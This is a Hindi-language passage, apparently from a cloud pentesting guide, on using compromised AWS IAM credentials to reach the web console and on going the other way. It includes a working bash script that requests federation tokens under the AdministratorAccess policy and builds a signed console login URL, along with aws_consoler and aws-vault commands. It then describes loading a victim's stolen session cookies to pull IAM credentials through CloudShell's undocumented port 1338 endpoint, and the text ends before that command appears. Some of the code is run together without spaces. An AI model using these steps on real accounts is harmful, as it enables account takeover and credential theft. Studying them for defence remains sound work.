यदि आप कुछ IAM क्रेडेंशियल प्राप्त करने में सफल रहे हैं, तो आप वेब कंसोल तक पहुँचने में रुचि रखते होंगे, निम्नलिखित उपकरणों का उपयोग करके।
ध्यान दें कि उपयोगकर्ता/भूमिका को sts:GetFederationToken अनुमति होनी चाहिए।
Custom script
निम्नलिखित स्क्रिप्ट डिफ़ॉल्ट प्रोफ़ाइल और एक डिफ़ॉल्ट AWS स्थान (न तो gov और न ही cn) का उपयोग करेगी ताकि आपको एक साइन किया हुआ URL मिल सके जिसका उपयोग आप वेब कंसोल में लॉगिन करने के लिए कर सकते हैं:
# Get federated creds (you must indicate a policy or they won't have any perms)## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges## Don't forget to use [--profile <prof_name>] in the first line if you need tooutput=$(awsstsget-federation-token--nameconsoler--policy-arnsarn=arn:aws:iam::aws:policy/AdministratorAccess)if [ $? -ne0 ]; thenecho"The command 'aws sts get-federation-token --name consoler' failed with exit status $status"exit $statusfi# Parse the outputsession_id=$(echo $output |jq-r'.Credentials.AccessKeyId')session_key=$(echo $output |jq-r'.Credentials.SecretAccessKey')session_token=$(echo $output |jq-r'.Credentials.SessionToken')# Construct the JSON credentials stringjson_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpointfederation_endpoint="https://signin.aws.amazon.com/federation"# Make the HTTP request to get the sign-in tokenresp=$(curl-s"$federation_endpoint" \--get \--data-urlencode "Action=getSigninToken" \--data-urlencode "SessionDuration=43200" \--data-urlencode "Session=$json_creds")signin_token=$(echo-n $resp |jq-r'.SigninToken'|tr-d'\n'|jq-sRr@uri)# Give the URL to loginecho -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
cd/tmppython3-mvenvenvsource./env/bin/activatepipinstallaws-consoleraws_consoler [params...] #This will generate a link to login into the console
सुनिश्चित करें कि IAM उपयोगकर्ता के पास sts:GetFederationToken अनुमति है, या एक भूमिका प्रदान करें जिसे ग्रहण किया जा सके।
aws-vault
aws-vault एक उपकरण है जो विकास वातावरण में AWS क्रेडेंशियल्स को सुरक्षित रूप से स्टोर और एक्सेस करने के लिए है।
aws-vaultlistaws-vaultexecjonsmith--awss3ls# Execute aws cli with jonsmith credsaws-vaultloginjonsmith# Open a browser logged as jonsmith
आप aws-vault का उपयोग करके ब्राउज़र कंसोल सत्र प्राप्त कर सकते हैं
कंसोल से IAM क्रेडेंशियल्स तक
इस पोस्ट में मूल रूप से खोजा गया, यदि आप किसी वेब कंसोल तक पहुंच को समझौता करने में सफल होते हैं (शायद आपने कुकीज़ चुरा लीं और .aws फ़ोल्डर तक पहुंच नहीं कर सके), तो आप CloudShell के माध्यम से उस उपयोगकर्ता के लिए कुछ IAM टोकन क्रेडेंशियल्स प्राप्त कर सकते हैं।
CloudShell IAM क्रेडेंशियल्स को पोर्ट 1338 पर एक अप्रलेखित एंडपॉइंट के माध्यम से उजागर करता है। पीड़ित से सत्र कुकीज़ को अपने ब्राउज़र में लोड करने के बाद, आप CloudShell पर जा सकते हैं और IAM क्रेडेंशियल्स प्राप्त करने के लिए निम्नलिखित कमांड जारी कर सकते हैं।